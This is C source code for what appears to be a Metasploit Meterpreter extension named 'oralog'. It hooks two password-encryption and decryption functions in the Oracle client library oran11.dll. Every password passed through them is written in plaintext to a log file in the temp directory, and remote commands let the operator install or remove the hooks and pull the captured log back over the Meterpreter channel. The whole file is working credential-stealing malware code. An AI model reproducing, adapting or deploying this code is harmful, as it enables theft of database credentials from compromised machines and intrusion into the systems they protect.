/*
 * This module implements OCI driver function hooking features 
 */
#define _CRT_SECURE_NO_DEPRECATE 1
#include "../../common/common.h"
#include "oralog.h"

#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the 
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"

#include "mhook-lib\mhook.h"
#include <string.h>

// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();

char logfn[1000] = {"\0"};

PZTVO5PE  o_pztvo5pe;
PZTVO5PD  o_pztvo5pd;

BOOL ispztvo5pe	 = 0;
BOOL ispztvo5pd  = 0;



int m_PZTVO5PE(e_key_comb* key, char* pwd, int i, unsigned char* res, int* k)
{
	char message[1000] = {'\0'};
	sprintf(message,"[pztvo5pe] Password: %s\n",pwd);
	write_log(logfn, message);
	return o_pztvo5pe(key, pwd, i, res, k);
	
}

int m_PZTVO5PD(e_key_comb* key, char* encpwd, int i, unsigned char* res, int* k)
{
	char message[1000] = {'\0'};
	
	int ret=o_pztvo5pd(key, encpwd, i, res, k);
	res[*k]='\0';
	sprintf(message,"[pztvo5pd] Password: %s\n",res);
	write_log(logfn, message);
	return ret;
}

int hookpztvo5pe()
{
	char message[1000] = {'\0'};
	if (!ispztvo5pe)
	{
		HMODULE hMod;
		char dll_to_hook[200] = {'\0'};

		strncpy(dll_to_hook, "oran11.dll", 200);
		hMod = GetModuleHandleA(dll_to_hook);

		if (hMod == NULL)
		{
			write_log(logfn,"[hookpztvo5pe] ERROR: Function cannot be hooked\n");
			return ERROR_NOT_FOUND;
		}

		//Get the address of the original function and
		//redirect the call into our function 
		o_pztvo5pe = (PZTVO5PE) GetProcAddress(hMod, "ztvo5pe");
		Mhook_SetHook((PVOID*)&o_pztvo5pe, m_PZTVO5PE);

		ispztvo5pe = 1;
		return ERROR_SUCCESS;
	}
	return ERROR_ALREADY_INITIALIZED;
}

DWORD request_oralog_hookpztvo5pe(Remote *remote, Packet *packet)
{
	
	Packet *response = packet_create_response(packet);
	
	DWORD result = hookpztvo5pe();

	switch (result)
	{
	case ERROR_SUCCESS: 
		packet_add_tlv_string(response, TLV_TYPE_ORALOG_HOOKPZTVO5PE, "pztvo5pe function hooking completed\n");
		packet_transmit_response(ERROR_SUCCESS, remote, response);
		return ERROR_SUCCESS;
	case ERROR_NOT_FOUND:
		packet_add_tlv_string(response, TLV_TYPE_ORALOG_HOOKPZTVO5PE, "pztvo5pe function cannot be hooked\n");
		packet_transmit_response(ERROR_NOT_FOUND, remote, response);
		return ERROR_NOT_FOUND;
	case ERROR_ALREADY_INITIALIZED:
		packet_add_tlv_string(response, TLV_TYPE_ORALOG_HOOKPZTVO5PE, "pztvo5pe function has already been hooked\n");
		packet_transmit_response(ERROR_ALREADY_INITIALIZED, remote, response);
		return ERROR_ALREADY_INITIALIZED;
	}
		
}

int hookpztvo5pd()
{
	if (!ispztvo5pd)
	{
		HMODULE hMod;
		char dll_to_hook[200] = {'\0'};

		strncpy(dll_to_hook, "oran11.dll", 200);
		hMod = GetModuleHandleA(dll_to_hook);

		if (hMod == NULL)
		{
			write_log(logfn,"[hookpztvo5pd] ERROR: Function cannot be hooked\n");
			return ERROR_NOT_FOUND;
		}

		//Get the address of the original function and
		//redirect the call into our function 
		o_pztvo5pd = (PZTVO5PD) GetProcAddress(hMod, "ztvo5pd");
		Mhook_SetHook((PVOID*)&o_pztvo5pd, m_PZTVO5PD);

		ispztvo5pd = 1;
		return ERROR_SUCCESS;
	}
	return ERROR_ALREADY_INITIALIZED;
}

DWORD request_oralog_hookpztvo5pd(Remote *remote, Packet *packet)
{
	
	Packet *response = packet_create_response(packet);
	
	DWORD result = hookpztvo5pd();

	switch (result)
	{
	case ERROR_SUCCESS: 
		packet_add_tlv_string(response, TLV_TYPE_ORALOG_HOOKPZTVO5PD, "pztvo5pd function hooking completed\n");
		packet_transmit_response(ERROR_SUCCESS, remote, response);
		return ERROR_SUCCESS;
	case ERROR_NOT_FOUND:
		packet_add_tlv_string(response, TLV_TYPE_ORALOG_HOOKPZTVO5PD, "pztvo5pd function cannot be hooked\n");
		packet_transmit_response(ERROR_NOT_FOUND, remote, response);
		return ERROR_NOT_FOUND;
	case ERROR_ALREADY_INITIALIZED:
		packet_add_tlv_string(response, TLV_TYPE_ORALOG_HOOKPZTVO5PD, "pztvo5pd function has already been hooked\n");
		packet_transmit_response(ERROR_ALREADY_INITIALIZED, remote, response);
		return ERROR_ALREADY_INITIALIZED;
	}
		
}


DWORD request_oralog_hook(Remote *remote, Packet *packet)
{
	
	Packet *response = packet_create_response(packet);

	DWORD result1,result2;
	
	result1 = hookpztvo5pe();
	result2 = hookpztvo5pd();

	if (result1 == ERROR_SUCCESS && result2 == ERROR_SUCCESS)
	{
		packet_add_tlv_string(response, TLV_TYPE_ORALOG_HOOK, "Function hooking completed\n");
		packet_transmit_response(ERROR_SUCCESS, remote, response);
		return ERROR_SUCCESS;
	}
	else 
	{
		packet_add_tlv_string(response, TLV_TYPE_ORALOG_HOOK, "Function hooking failed. See the logfile (getlogfile) for more details\n");
		packet_transmit_response(ERROR_SUCCESS, remote, response);
		return ERROR_ERRORS_ENCOUNTERED;
	}
}

int unhookpztvo5pe()
{
	HMODULE hMod;
	char dll_to_hook[200] = {'\0'};

	if (ispztvo5pe)
	{
		strncpy(dll_to_hook, "oran11.dll", 200);
		hMod = GetModuleHandleA(dll_to_hook);
		if (hMod == NULL) return 1;
		Mhook_Unhook((PVOID*)&o_pztvo5pe);
		ispztvo5pe = 0;
	}

}

DWORD request_oralog_unhookpztvo5pe(Remote *remote, Packet *packet)
{
	Packet *response = packet_create_response(packet);
	
	unhookpztvo5pe();

	packet_add_tlv_string(response, TLV_TYPE_ORALOG_UNHOOKPZTVO5PE, "pztvo5pe function unhooking completed\n");
	packet_transmit_response(ERROR_SUCCESS, remote, response);

	return ERROR_SUCCESS;
}

int unhookpztvo5pd()
{
	HMODULE hMod;
	char dll_to_hook[200] = {'\0'};

	if (ispztvo5pd)
	{
		strncpy(dll_to_hook, "oran11.dll", 200);
		hMod = GetModuleHandleA(dll_to_hook);
		if (hMod == NULL) return 1;
		Mhook_Unhook((PVOID*)&o_pztvo5pd);
		ispztvo5pd = 0;
	}

}

DWORD request_oralog_unhookpztvo5pd(Remote *remote, Packet *packet)
{
	Packet *response = packet_create_response(packet);
	
	unhookpztvo5pd();

	packet_add_tlv_string(response, TLV_TYPE_ORALOG_UNHOOKPZTVO5PD, "pztvo5pd function unhooking completed\n");
	packet_transmit_response(ERROR_SUCCESS, remote, response);

	return ERROR_SUCCESS;
}

DWORD request_oralog_unhook(Remote *remote, Packet *packet)
{
	
	Packet *response = packet_create_response(packet);
	
	unhookpztvo5pe();
	unhookpztvo5pd();

	packet_add_tlv_string(response, TLV_TYPE_ORALOG_UNHOOK, "Function unhooking completed\n");
	packet_transmit_response(ERROR_SUCCESS, remote, response);

	return ERROR_SUCCESS;
}


long getfilesize(char *filename)
{
   long filesize;
   FILE *FileToCheck = NULL;
   FileToCheck = fopen(filename, "rb");
   if (!FileToCheck)
	   return -1;
   fseek(FileToCheck, 0, SEEK_END);  
   filesize = ftell(FileToCheck);  
   fclose(FileToCheck);  
   return filesize;
}

DWORD request_oralog_getlogfile(Remote *remote, Packet *packet)
{
	
	Packet *response = packet_create_response(packet);
	FILE * fp;
	long size = 0;
	long readbytes = 0;
	char *buffer;
	char line[1024];
	int n;

	size = getfilesize(logfn);
	if (size<0)
		return ERROR_FILE_NOT_FOUND;

	buffer = (char*)malloc(size+1);
	memset(buffer,0,size+1);
	
	fp = fopen (logfn, "rt");  /* open the file for reading */
   /* elapsed.dta is the name of the file */
   /* "rt" means open the file for reading text */

   while(fgets(line, 1024, fp) != NULL)
   {
	   n = strlen(line);
	   readbytes += n;
	   strncat(buffer,line,n);
   }
   buffer[size] = '\0';
   fclose(fp); 
   
   packet_add_tlv_string(response, TLV_TYPE_ORALOG_GETLOGFILE, buffer);
   packet_transmit_response(ERROR_SUCCESS, remote, response);

	return ERROR_SUCCESS;
}

DWORD request_oralog_setlogfile(Remote *remote, Packet *packet)
{
	
	Packet *response = packet_create_response(packet);
	char *fn = NULL;
	int n;
	char message[1000] = {'\0'};
	DWORD retval = ERROR_SUCCESS;

	Tlv tlv;
	//Get file contents
	if((retval = packet_get_tlv(packet, TLV_TYPE_ORALOG_SETLOGFILE, &tlv)) == ERROR_SUCCESS)
	{
		//Get file name
		fn = packet_get_tlv_value_string(packet, TLV_TYPE_ORALOG_SETLOGFILE);
		strncpy(logfn,fn,1000);
		sprintf(message, "New log file: %s\n",logfn);
		write_log(logfn,message);
	} 
  
    packet_add_tlv_string(response, TLV_TYPE_ORALOG_SETLOGFILE, message);
    packet_transmit_response(ERROR_SUCCESS, remote, response);

	return ERROR_SUCCESS;
}


Command customCommands[] =
{
	
	{ "oralog_hook",
	  { request_oralog_hook,                     { 0 }, 0 },
	  { EMPTY_DISPATCH_HANDLER                                      },
	},

    { "oralog_unhook",
	  { request_oralog_unhook,                     { 0 }, 0 },
	  { EMPTY_DISPATCH_HANDLER                                      },
	},
	
	{ "oralog_setlogfile",
	  { request_oralog_setlogfile,                     { 0 }, 0 },
	  { EMPTY_DISPATCH_HANDLER                                      },
	},

	{ "oralog_getlogfile",
	  { request_oralog_getlogfile,                     { 0 }, 0 },
	  { EMPTY_DISPATCH_HANDLER                                      },
	},

	{ "oralog_hookpztvo5pe",
	  { request_oralog_hookpztvo5pe,                     { 0 }, 0 },
	  { EMPTY_DISPATCH_HANDLER                                      },
	},

	{ "oralog_hookpztvo5pd",
	  { request_oralog_hookpztvo5pd,                     { 0 }, 0 },
	  { EMPTY_DISPATCH_HANDLER                                      },
	},

	{ "oralog_unhookpztvo5pe",
	  { request_oralog_unhookpztvo5pe,                     { 0 }, 0 },
	  { EMPTY_DISPATCH_HANDLER                                      },
	},

	{ "oralog_unhookpztvo5pd",
	  { request_oralog_unhookpztvo5pd,                     { 0 }, 0 },
	  { EMPTY_DISPATCH_HANDLER                                      },
	},

	// Terminator
	{ NULL,
	  { EMPTY_DISPATCH_HANDLER                      },
	  { EMPTY_DISPATCH_HANDLER                      },
	},
};



/*
 * Initialize the server extension
 */
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
	DWORD index;

	char val[1000];
	strncpy(val,getenv("TEMP"),950);
    strncat(val,"\\oralog.txt",11);   
	strncpy(logfn,val,1000);

	write_log(logfn,"[InitServerExtension] Extension loaded\n");

	hMetSrv = remote->hMetSrv;

	for (index = 0;
	     customCommands[index].method;
	     index++)
		command_register(&customCommands[index]);

	return ERROR_SUCCESS;
}

/*
 * Deinitialize the server extension
 */
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
	DWORD index;

	for (index = 0;
	     customCommands[index].method;
	     index++)
		command_deregister(&customCommands[index]);

	write_log(logfn,"[DeInitServerExtension] Extension unloaded\n");
	return ERROR_SUCCESS;
}




int write_log(const char* logfn,char *message){
	FILE* errfh;

	errfh=fopen(logfn,"a");
	if(errfh==NULL){
		fprintf(stderr,"Could open the log file!\n");
		return -1;
	}
	fprintf(errfh,"%s", message);
	fclose(errfh);
	return 0;
}